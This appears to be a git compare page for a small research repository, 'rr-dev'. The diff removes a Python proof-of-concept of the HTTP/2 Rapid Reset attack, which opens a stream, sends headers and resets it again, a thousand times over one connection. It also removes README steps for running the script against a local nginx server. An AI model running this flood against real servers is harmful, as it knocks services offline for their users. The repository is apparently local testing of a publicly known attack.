Compare commits

..

No commits in common. "188ab597014bc9b31f17230fbcba7e15f94f02a9" and "9fde8d6fbe08ed90712c373a5cbcee60ad49c237" have entirely different histories.

4 changed files with 6 additions and 72 deletions

5
.gitignore vendored
View File

@ -2,7 +2,4 @@ venv/
.idea/
__pycache__/
*.py[cod]
# ignore ssl keylogs
*.log
*.py[cod]

View File

@ -1,22 +1,12 @@
# rr-dev
1. start http/2 enabled nginx server:
start http/2 enabled nginx server:
```
cd server
docker compose up -d
```
2. start capturing traffic in wireshark
3. run poc script:
run poc:
```
python rr.py
```
4. decode traffic in wireshark using `ssl-keylog.log` as the ssl keyfile
## notes
no clue if this actually works, but it seems to match the same behavior
mentioned in the cloudflare blog.
greets to psyk0, slerig, and all the other juggalols out there
# needs to be written first, lol
```

View File

@ -44,7 +44,7 @@ def make_http2_request():
(':scheme', 'https'),
]
c.send_headers(
stream_id=c.get_next_available_stream_id(),
stream_id=1,
headers=headers,
end_stream=True
)

View File

@ -1,54 +1 @@
"""rrpoc"""
import socket
import ssl
import certifi
import h2.connection
import h2.events
from time import sleep
ctx = ssl.create_default_context(cafile=certifi.where())
ctx.set_alpn_protocols(['h2'])
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.keylog_filename = 'ssl-keylog.log'
def send_rr_packets(server='localhost', port=443, max_streams=1000):
s = socket.create_connection((server, port))
s = ctx.wrap_socket(s, server_hostname=server)
c = h2.connection.H2Connection()
c.initiate_connection()
s.sendall(c.data_to_send())
headers = [
(':method', 'GET'),
(':path', '/foo'),
(':authority', server),
(':scheme', 'https'),
]
for _ in range(max_streams):
sid = c.get_next_available_stream_id()
c.send_headers(
stream_id=sid,
headers=headers,
end_stream=True
)
c.reset_stream(sid)
s.sendall(c.data_to_send())
# Add sleep or else the socket gets closed which causes server to
# stop trying to respond to our requests.
sleep(60)
s.close()
def main():
send_rr_packets(server='localhost', port=443)
if __name__ == '__main__':
main()